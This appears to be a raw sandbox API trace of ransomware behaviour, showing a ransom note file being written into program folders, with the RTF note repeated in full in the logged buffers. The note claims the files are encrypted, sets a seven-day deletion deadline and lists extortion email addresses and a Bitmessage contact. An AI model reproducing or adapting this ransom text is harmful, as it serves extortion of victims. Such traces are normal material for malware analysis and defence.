Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nRµ\x02Øò~Â\x959Äþ\x89\x9ck*øØÝhÞ1O\x1e\x13\x07", lpUsedDefaultChar=0x0) returned 8717 [0211.719] WriteFile (in: hFile=0x2b0, lpBuffer=0x248a558*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a558*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0211.720] CloseHandle (hObject=0x2b0) returned 1 [0212.363] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\#readme_eman#.rtf")) returned 0x20 [0212.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\#readme_eman#.rtf")) returned 0x20 [0212.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\#readme_eman#.rtf")) returned 0x20 [0212.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office 15\\ClientX64\\#README_EMAN#.rtf" (normalized: "c:\\program files\\microsoft office 15\\clientx64\\#readme_eman#.rtf")) returned 0xffffffff [0212.363] GetLastError () returned 0x2 [0212.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office 15\\ClientX64\\#README_EMAN#.rtf" (normalized: "c:\\program files\\microsoft office 15\\clientx64\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0213.059] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0213.059] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0213.059] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4b618, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r 